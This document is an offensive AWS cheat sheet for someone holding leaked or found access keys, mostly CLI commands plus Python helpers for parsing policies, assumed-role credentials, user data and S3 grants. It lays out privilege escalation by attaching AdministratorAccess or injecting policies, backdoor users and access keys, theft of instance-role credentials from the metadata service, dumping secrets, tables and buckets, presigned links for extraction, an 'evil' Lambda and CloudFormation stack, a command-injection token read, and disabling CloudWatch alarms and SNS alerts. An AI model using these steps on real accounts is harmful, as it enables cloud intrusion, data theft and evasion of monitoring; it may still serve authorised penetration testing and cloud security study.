So you found some AWS keys...
who am I
aws sts get-caller-identity
who is who
aws iam get-user --user-name AmosBurton --profile initial
aws ec2 describe-instances
aws s3 ls
aws s3api list-buckets
aws iam list-users
aws iam list-roles
aws iam list-groups-for-user --user-name user-example
aws iam list-group-policies --group-name Admins
...
aws iam list-attached-role-policies --role-name ad-example
aws iam list-attached-user-policies --user-name user-example
aws iam list-user-policies --user-name user-example
There are managed policies and inline policies, see here. Check especially the inline policies and everything custom, as these are likely candidates for excessive permissions and privilege escalation.
aws iam get-policy --policy-arn ...
aws iam get-user-policy --user-name user-example --policy-name ...
aws iam get-policy-version --policy-arn ... --version-id v1
aws iam get-role-policy --role-name ... --policy-name ...
In the policy documents also check for autogenerated policies, e.g. via Terraform, and look where the wildcards are: these are often misconfigured, or simply have the wrong wildcard in the wrong place. This can sometimes provide an opportunity to assume roles nobody thought you should...
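Added example, not part of the original cheat sheet: a small script that takes the JSON printed by get-policy-version / get-user-policy / get-role-policy and flags wildcard actions, wildcard resources and the usual privesc-capable actions per statement. The sample policy is constructed, and PRIVESC_ACTIONS is an assumed starting list, not an AWS reference; extend it for the engagement.

```python
"""Flag privilege-escalation candidates in an IAM policy document."""
import fnmatch
import json

# Actions that let a principal grant itself more power, alone or together
# with iam:PassRole. Assumed starting list, deliberately short.
PRIVESC_ACTIONS = {
    "iam:AttachUserPolicy", "iam:AttachGroupPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutGroupPolicy", "iam:PutRolePolicy",
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:AddUserToGroup", "iam:CreateLoginProfile", "iam:UpdateLoginProfile",
    "iam:CreateAccessKey", "iam:UpdateAssumeRolePolicy", "iam:PassRole",
    "sts:AssumeRole", "lambda:CreateFunction", "lambda:UpdateFunctionCode",
    "ec2:RunInstances", "cloudformation:CreateStack",
}


def _as_list(value):
    """IAM allows a bare string or a list in Statement/Action/Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def extract_document(cli_output):
    """Pull the policy document out of the CLI output (the CLI URL-decodes it)."""
    if "PolicyVersion" in cli_output:          # aws iam get-policy-version
        return cli_output["PolicyVersion"]["Document"]
    return cli_output["PolicyDocument"]        # get-user-policy / get-role-policy


def analyze_policy(doc):
    """Return (severity, sid, message) findings for every Allow statement."""
    findings = []
    for stmt in _as_list(doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "<no sid>")
        actions = _as_list(stmt.get("Action"))
        if "NotAction" in stmt:
            findings.append(("high", sid, "NotAction: allows everything except the listed actions"))
        for act in actions:
            if act == "*":
                findings.append(("high", sid, "Action * (full access)"))
            elif "*" in act:
                findings.append(("medium", sid, f"wildcard action {act}"))
        for res in _as_list(stmt.get("Resource")):
            if res == "*":
                findings.append(("medium", sid, "Resource * (all resources)"))
            elif "*" in res:
                findings.append(("low", sid, f"wildcard in resource {res}"))
        # IAM action matching is case-insensitive; '*' and '?' are wildcards.
        matched = sorted(
            p for p in PRIVESC_ACTIONS
            if any(fnmatch.fnmatchcase(p.lower(), pat.lower()) for pat in actions)
        )
        if matched:
            findings.append(("high", sid, "privesc-capable: " + ", ".join(matched)))
        if "Condition" in stmt:
            findings.append(("info", sid, "has Condition, verify it really restricts the grant"))
    return findings


# Constructed sample in the shape of `aws iam get-policy-version` output.
SAMPLE_GET_POLICY_VERSION = json.dumps({
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {"Sid": "TerraformDeploy", "Effect": "Allow",
                 "Action": ["s3:GetObject", "s3:ListBucket"],
                 "Resource": "arn:aws:s3:::build-artifacts-*"},
                {"Sid": "ScopedAssume", "Effect": "Allow",
                 "Action": "sts:AssumeRole",
                 "Resource": "arn:aws:iam::*:role/deploy-*"},
                {"Sid": "Ops", "Effect": "Allow",
                 "Action": ["iam:Pass*", "ec2:RunInstances"],
                 "Resource": "*"},
            ],
        },
        "VersionId": "v1",
        "IsDefaultVersion": True,
    }
})


def demo():
    """Run the analysis over the constructed sample."""
    return analyze_policy(extract_document(json.loads(SAMPLE_GET_POLICY_VERSION)))


if __name__ == "__main__":
    for sev, sid, msg in demo():
        print(f"[{sev:6}] {sid}: {msg}")
```

The interesting hit in the sample is the "Ops" statement: iam:Pass* plus ec2:RunInstances on Resource * is exactly the run-instances-with-an-admin-instance-profile path further down this page, and the wildcard in the sts:AssumeRole resource is the kind of Terraform output that lets you assume roles in other accounts.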
attach the AWS-managed AdministratorAccess policy to a user or group (needs iam:AttachUserPolicy / iam:AttachGroupPolicy)
aws iam attach-user-policy --user-name user-example --policy-arn ...
aws iam attach-user-policy --user-name user-example --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam attach-group-policy --group-name developer --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
add your own policy JSON to an existing policy, group or role (needs your own policy file obviously; create-policy-version on a customer-managed policy needs iam:CreatePolicyVersion, the put-*-policy calls need the matching iam:Put*Policy)
aws iam create-policy-version --policy-arn arn:aws:iam::666666666666:policy/Print --policy-document file:///.../newAdminPolicy.json --set-as-default
aws iam put-group-policy --group-name Admins --policy-document file:///.../newAdminPolicy.json --policy-name AdminRoot
aws iam put-role-policy --role-name developerlambda --policy-name AdminMeow --policy-document file:///.../newAdminPolicy.json
aws iam list-role-policies --role-name admin
aws iam get-role-policy --role-name admin --policy-name AddUser
aws sts assume-role --role-arn arn:aws:iam::666666666666:role/ad-example --role-session-name ad-example
This is my favorite cheat sheet on the whole Citadel
aws sts assume-role --role-arn arn:aws:iam::666666666666:role/role-name --role-session-name "Garrus" --profile initial_temp > assume-role-output.txt
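Added example, not part of the original cheat sheet: once assume-role-output.txt exists you still have to get the temporary creds into the CLI. This parses the JSON, emits export lines for the current shell or a profile block for ~/.aws/credentials, and tells you how long the session has left. The sample output is constructed and the key material is fake.

```python
"""Turn `aws sts assume-role ... > assume-role-output.txt` into usable creds."""
import json
from datetime import datetime, timezone

# AssumeRole field name -> environment variable the CLI/SDKs read.
ENV_NAMES = {
    "AccessKeyId": "AWS_ACCESS_KEY_ID",
    "SecretAccessKey": "AWS_SECRET_ACCESS_KEY",
    "SessionToken": "AWS_SESSION_TOKEN",
}


def parse_assume_role(text):
    """Return {'env': {...}, 'expiration': str, 'arn': str} from the CLI JSON."""
    data = json.loads(text)
    creds = data["Credentials"]
    return {
        "env": {ENV_NAMES[k]: creds[k] for k in ENV_NAMES},
        "expiration": creds["Expiration"],
        "arn": data["AssumedRoleUser"]["Arn"],
    }


def export_lines(parsed):
    """Shell lines to eval so the current shell acts as the role."""
    return "\n".join(f"export {k}='{v}'" for k, v in parsed["env"].items())


def profile_block(name, parsed):
    """Block to append to ~/.aws/credentials; then use --profile <name>.
    The third key is aws_session_token, forgetting it gives InvalidClientTokenId."""
    env = parsed["env"]
    return (
        f"[{name}]\n"
        f"aws_access_key_id = {env['AWS_ACCESS_KEY_ID']}\n"
        f"aws_secret_access_key = {env['AWS_SECRET_ACCESS_KEY']}\n"
        f"aws_session_token = {env['AWS_SESSION_TOKEN']}\n"
    )


def _parse_iso(ts):
    # CLI v2 prints +00:00; other tooling prints a trailing Z.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def seconds_left(parsed, now_iso=None):
    """Seconds until the session creds expire (negative: already dead)."""
    now = _parse_iso(now_iso) if now_iso else datetime.now(timezone.utc)
    return int((_parse_iso(parsed["expiration"]) - now).total_seconds())


# Constructed sample in the shape of `aws sts assume-role` output (fake values).
SAMPLE_ASSUME_ROLE_OUTPUT = json.dumps({
    "Credentials": {
        "AccessKeyId": "ASIACONSTRUCTED00001",
        "SecretAccessKey": "constructedSecretKeyNotRealxxxxxxxxxxxxx",
        "SessionToken": "FwoGZXIvYXdzEconstructedSessionToken==",
        "Expiration": "2030-01-01T01:00:00+00:00",
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROACONSTRUCTED00001:Garrus",
        "Arn": "arn:aws:sts::666666666666:assumed-role/role-name/Garrus",
    },
})


if __name__ == "__main__":
    parsed = parse_assume_role(SAMPLE_ASSUME_ROLE_OUTPUT)
    print(export_lines(parsed))
    print(profile_block("assumed", parsed))
    print("seconds left:", seconds_left(parsed))
```

Typical use: `eval "$(python3 assume.py)"` for the export form, then `aws sts get-caller-identity` to confirm the ARN now shows assumed-role/... instead of the original user.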
aws iam list-policies | grep 'AdministratorAccess'
This shows the AWS-managed policies named AdministratorAccess (list-policies returns AWS-managed and customer-managed policies by default); you can also just grep for admin
aws iam list-policies | grep 'Manfred'
aws iam list-policies | grep 'developer'
aws iam list-policies | grep 'snowcrashLambda'
Custom policies are good to look at: grep for developer, engineer and such, but also try names of people in the org you know (maybe there is something intended just for them), or names of discovered important services or parts of the org, as those policies are often attached to make things work, and as they are not from AWS itself they are (in my experience) more likely to be misconfigured. list-policies also accepts --scope Local to show only the customer-managed ones.
aws iam add-user-to-group --group-name developer --user-name kevin
aws iam create-login-profile --user-name mandy --password 'compliance123!' --no-password-reset-required
(quote the password, in bash an unquoted ! triggers history expansion)
aws iam create-user --user-name backdoorbeaver
aws iam create-access-key --user-name Bob
aws ec2 describe-subnets
aws ec2 describe-security-groups
aws iam list-instance-profiles
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
launch with an existing instance profile (needs iam:PassRole on the role behind it), then read the role creds from the metadata service
aws ec2 run-instances --subnet-id subnet-.... --image-id ami-... --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-..."
aws ec2 authorize-security-group-ingress --group-id ... --protocol tcp --port 22 --cidr 0.0.0.0/0
aws ec2 describe-iam-instance-profile-associations --region us-east-2 --profile initial
aws ec2 describe-instance-attribute --attribute userData --instance-id instance-id
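Added example, not part of the original cheat sheet: describe-instance-attribute returns the user data base64-encoded, and bootstrap scripts are a classic place for hard-coded keys. This decodes it (gzip too, cloud-init accepts that) and runs a few quick regexes over it. The regexes are assumed heuristics, not an AWS reference, and the bootstrap script below is constructed with fake values.

```python
"""Decode EC2 user data and grep it for credentials."""
import base64
import gzip
import json
import re

# Assumed heuristics; tune for the target.
PATTERNS = {
    "aws access key id": r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b",
    "aws secret key assignment": r"(?i)aws_secret_access_key\s*[=:]\s*\S+",
    "password assignment": r"(?i)(?:password|passwd|pwd)\s*[=:]\s*\S+",
    "private key block": r"-----BEGIN [A-Z ]*PRIVATE KEY-----",
    "iam arn": r"arn:aws:iam::\d{12}:(?:role|user)/\S+",
}


def decode_user_data(cli_output):
    """Return the user data as text, or '' when the instance has none."""
    value = (cli_output.get("UserData") or {}).get("Value")
    if not value:
        return ""
    raw = base64.b64decode(value)
    if raw[:2] == b"\x1f\x8b":            # gzip magic: cloud-init allows gzip'd user data
        raw = gzip.decompress(raw)
    return raw.decode("utf-8", errors="replace")


def find_secrets(text):
    """Return (label, line_number, matched_text) for every hit, in file order."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS.items():
            for m in re.finditer(pattern, line):
                hits.append((label, lineno, m.group(0)))
    return hits


# Constructed sample: what a sloppy bootstrap script often looks like (fake values).
SAMPLE_SCRIPT = """#!/bin/bash
# bootstrap (constructed sample, values are fake)
export AWS_ACCESS_KEY_ID=AKIACONSTRUCTED00001
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYCONSTRUCTED
DB_PASSWORD=compliance123!
aws s3 cp s3://deploy-templates/stack.yaml /opt/stack.yaml
"""
# Same shape as `aws ec2 describe-instance-attribute --attribute userData` output.
SAMPLE_DESCRIBE_OUTPUT = json.dumps({
    "InstanceId": "i-0123456789abcdef0",
    "UserData": {"Value": base64.b64encode(SAMPLE_SCRIPT.encode()).decode()},
})


def demo():
    """Decode and scan the constructed sample."""
    return find_secrets(decode_user_data(json.loads(SAMPLE_DESCRIBE_OUTPUT)))


if __name__ == "__main__":
    for label, lineno, match in demo():
        print(f"line {lineno}: {label}: {match}")
```

Pipe the real thing in with `aws ec2 describe-instance-attribute --attribute userData --instance-id i-... | python3 userdata.py` after swapping the sample for `json.load(sys.stdin)`; the same scanner is worth running over anything you pull off an attached snapshot volume.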
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/user-data
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
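Added example, not part of the original cheat sheet: the curl lines above are IMDSv1. When the instance enforces IMDSv2 (HttpTokens=required) they come back 401 and you first need a session token from a PUT to /latest/api/token. Also note the instance profile role creds live under /latest/meta-data/iam/security-credentials/<role>; the identity-credentials/ec2 path above is the instance identity role, a different thing. The `fetch` callable is injectable so the flow runs offline against the constructed FakeImds; on a real instance the default http_fetch talks to 169.254.169.254.

```python
"""Pull the instance role credentials from IMDS, the IMDSv2 way."""
import json
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def http_fetch(method, path, headers=None):
    """Real transport: one HTTP call to the metadata service."""
    req = urllib.request.Request(IMDS + path, method=method, headers=headers or {})
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.read().decode()


def imds_role_credentials(fetch=http_fetch, ttl=21600):
    """Return (role_name, creds_dict) using an IMDSv2 session token."""
    token = fetch("PUT", "/latest/api/token",
                  {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})
    auth = {"X-aws-ec2-metadata-token": token}
    role = fetch("GET", CREDS_PATH, auth).strip().splitlines()[0]
    creds = json.loads(fetch("GET", CREDS_PATH + role, auth))
    return role, creds


def creds_to_env(creds):
    """IMDS calls the session token 'Token'; the CLI wants AWS_SESSION_TOKEN."""
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


def v1_request_blocked(fetch):
    """True if a tokenless (IMDSv1-style) request is refused."""
    try:
        fetch("GET", CREDS_PATH)
        return False
    except (PermissionError, urllib.error.HTTPError):
        return True


class FakeImds:
    """Constructed stand-in for an instance with HttpTokens=required (fake values)."""
    TOKEN = "AQAEAconstructedToken=="
    ROLE = "ec2_admin"
    CREDS = {
        "Code": "Success",
        "LastUpdated": "2030-01-01T00:00:00Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIACONSTRUCTED00002",
        "SecretAccessKey": "constructedSecretNotReal",
        "Token": "IQoJb3JpZ2luX2VjEconstructed==",
        "Expiration": "2030-01-01T06:00:00Z",
    }

    def __init__(self):
        self.unauthenticated_hits = 0

    def __call__(self, method, path, headers=None):
        headers = headers or {}
        if method == "PUT" and path == "/latest/api/token":
            if "X-aws-ec2-metadata-token-ttl-seconds" not in headers:
                raise ValueError("400: TTL header missing")
            return self.TOKEN
        if headers.get("X-aws-ec2-metadata-token") != self.TOKEN:
            self.unauthenticated_hits += 1
            raise PermissionError("401 Unauthorized (IMDSv2 required)")
        if path == CREDS_PATH:
            return self.ROLE + "\n"
        if path == CREDS_PATH + self.ROLE:
            return json.dumps(self.CREDS)
        raise FileNotFoundError(path)


if __name__ == "__main__":
    role, creds = imds_role_credentials()       # real IMDS, run on the instance
    print(role, creds_to_env(creds))
```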
aws ec2 create-key-pair --key-name nyankey --query 'KeyMaterial' --output text | out-file -encoding ascii -filepath nyankey.pem
(that is the PowerShell form; in bash just redirect with > nyankey.pem)
chmod 400 nyankey.pem
Find linked snapshots; sometimes the EC2 instance is gone but the data is still in EBS. Then one can create a volume from the snapshot, attach it to an EC2 instance you control and look for creds or templates. Always yearn for the YAML.
aws ec2 describe-snapshots --owner-ids self --profile ec2_dev
Create a volume from an existing snapshot (needs a real availability zone, e.g. eu-central-1a, and it must be the AZ of the instance you attach it to)
aws ec2 create-volume --snapshot-id snap-... --availability-zone eu-central-1a --profile ec2_dev
Attach this volume to an EC2 instance you control, then mount it inside the instance and search it
aws ec2 attach-volume --volume-id vol-... --instance-id i-... --device /dev/sdf --profile ec2_dev
aws dynamodb list-tables | jq -r .TableNames[]
aws dynamodb scan --table-name secrettable-233223 --region us-east-1
aws secretsmanager list-secrets --filter Key="name",Values="Area51" --profile compromised
aws secretsmanager get-secret-value --secret-id ... --region us-east-1
list buckets, get objects, ACL and policy, via the low-level s3api commands and via the high-level s3 commands
aws s3 ls --profile random_aws_keys
aws s3 --no-sign-request --region ap-southeast-1 ls s3://static-resources-example
aws s3 sync s3://user-resources-12jljlaj3434ljalsjf/ ./
aws s3api list-buckets
aws s3api list-objects --bucket ...
aws s3api get-object --bucket normandy --key garrus_great.jpg /home/casually_calibrating.png
aws s3api get-bucket-policy --bucket ... --output text | python -m json.tool
aws s3api get-bucket-acl --bucket ... > acl.json
aws s3api get-object-acl --bucket ... --key secret_object > object.json
--no-sign-request means you do not send AWS creds. In the context of S3, always also try with valid AWS creds; they do not have to be associated with your target (grants to the AuthenticatedUsers group apply to any AWS account). Why? Check my blogpost for why. ->To Blogpost
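Added example, not part of the original cheat sheet: once you have acl.json / object.json and the bucket policy, this picks out what actually makes the bucket reachable from outside. It reports ACL grants to the AllUsers (no creds) and AuthenticatedUsers (any AWS account, which is why the "try with any valid creds" advice above works) groups, and Allow statements with Principal "*" in the bucket policy, flagging whether a Condition narrows them. get-bucket-policy returns the policy as a JSON string inside "Policy", which is handled. The samples are constructed.

```python
"""Find world- or any-AWS-account-readable grants in S3 ACLs and bucket policies."""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
GROUP_LABELS = {
    ALL_USERS: "anyone (no creds needed)",
    AUTHENTICATED_USERS: "any AWS account (any valid creds)",
}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def open_acl_grants(acl):
    """(who, permission) for every grant to the two global groups.
    Works for get-bucket-acl and get-object-acl output alike."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in GROUP_LABELS:
            hits.append((GROUP_LABELS[grantee["URI"]], grant["Permission"]))
    return hits


def _principal_is_anyone(principal):
    # Both `"Principal": "*"` and `"Principal": {"AWS": "*"}` mean everybody.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def open_policy_statements(policy_output):
    """(sid, actions, has_condition) for Allow statements granted to everybody."""
    doc = json.loads(policy_output["Policy"])
    hits = []
    for stmt in _as_list(doc.get("Statement")):
        if stmt.get("Effect") == "Allow" and _principal_is_anyone(stmt.get("Principal")):
            hits.append((stmt.get("Sid", "<no sid>"),
                         _as_list(stmt.get("Action")),
                         "Condition" in stmt))
    return hits


# Constructed sample in the shape of `aws s3api get-bucket-acl` output.
SAMPLE_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS},
         "Permission": "READ"},
    ],
}
# Constructed sample in the shape of `aws s3api get-bucket-policy` output.
SAMPLE_POLICY_OUTPUT = {"Policy": json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::static-resources-example/*"},
        {"Sid": "CiWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::666666666666:role/ci"},
         "Action": ["s3:PutObject"],
         "Resource": "arn:aws:s3:::static-resources-example/*"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::static-resources-example",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-constructed"}}},
    ],
})}


if __name__ == "__main__":
    print("ACL:", open_acl_grants(SAMPLE_ACL))
    print("policy:", open_policy_statements(SAMPLE_POLICY_OUTPUT))
```

In the sample the ACL READ grant to AuthenticatedUsers is the one --no-sign-request will miss and any random AWS key will hit; the VpcOnly statement has Principal "*" but its Condition ties it to a VPC endpoint, so do not count it as public without checking.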
put your own policy or ACL file on the bucket/object
aws s3api put-bucket-policy --bucket ... --policy file://policy.json
aws s3api put-object-acl --bucket ... --key secret_object --access-control-policy file://object.json
aws s3api put-bucket-acl --bucket ... --access-control-policy file://acl.json
generate a presigned link for extraction (--expires-in is capped at 604800 seconds, i.e. 7 days)
aws s3 presign s3://bucket-lemmestealdis/Huliðshjálmr --expires-in 604800
list and show REST APIs, resources, methods and API keys
aws apigateway get-account
aws apigateway get-rest-apis
aws apigateway get-api-keys
aws apigateway get-api-key --api-key ... --include-value
aws apigateway get-resources --rest-api-id ...
aws apigateway get-method --rest-api-id ... --http-method GET --resource-id ...
aws lambda list-functions
aws lambda get-function --function-name DynamoFunction
aws lambda get-policy --function-name pawsitivty
Create your own evil Lambda function and invoke it, check here for how to. Needs iam:PassRole on the execution role you hand over with --role; the function then runs with that role's creds.
aws lambda create-function --function-name Ishimura --zip-file fileb://Ishimura.zip --handler index.handler --runtime nodejs18.x --role arn:aws:iam::666666666666:role/lambda-ex
aws lambda invoke --function-name Ishimura marker.txt
aws cloudformation list-stack-resources --stack-name weatherman
aws cloudformation describe-stack-events --stack-name intensification90
aws cloudformation get-template --stack-name stackmanfred
aws cloudformation validate-template --template-body file://evil.yaml
aws cloudformation create-stack --template-body file://evil.yaml --stack-name stolenstack --parameters ParameterKey=uri,ParameterValue=$uri --output text
aws cloudformation describe-stacks --stack-name stolenstack --query Stacks[*].Outputs --output text
aws cloudformation delete-stack --stack-name stolenstack --output text
aws ecr describe-repositories
(ECR repository names are lowercase only)
aws ecr get-repository-policy --repository-name stargatewasactualynice
aws ecr list-images --repository-name alwayshardstyle
aws ecr describe-images --repository-name hansjoerg --image-ids imageTag=Hannelore
aws ecs describe-clusters --cluster hiro
aws eks list-fargate-profiles --cluster-name GreedoDidNothingWrong
Inside a container (here via a command-injection parameter like cmd=), check the mounted service account token; for ECS tasks the task role creds come from http://169.254.170.2 plus $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI instead
cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token
If there are CloudWatch alarms or SNS notifications monitoring activity and you have the permissions, identify them and, if needed, deactivate them. Keep in mind these API calls themselves land in CloudTrail.
aws cloudwatch describe-alarms --alarm-names "soundofdapolice"
aws sns list-topics
aws sns list-subscriptions
aws cloudwatch disable-alarm-actions --alarm-names soundofdapolice
aws cloudwatch describe-alarm-history --alarm-name "iamshadow" --history-item-type StateUpdate
aws sns unsubscribe --subscription-arn arn:aws:sns:us-west-2:666666666666:my-topic:somerandomstring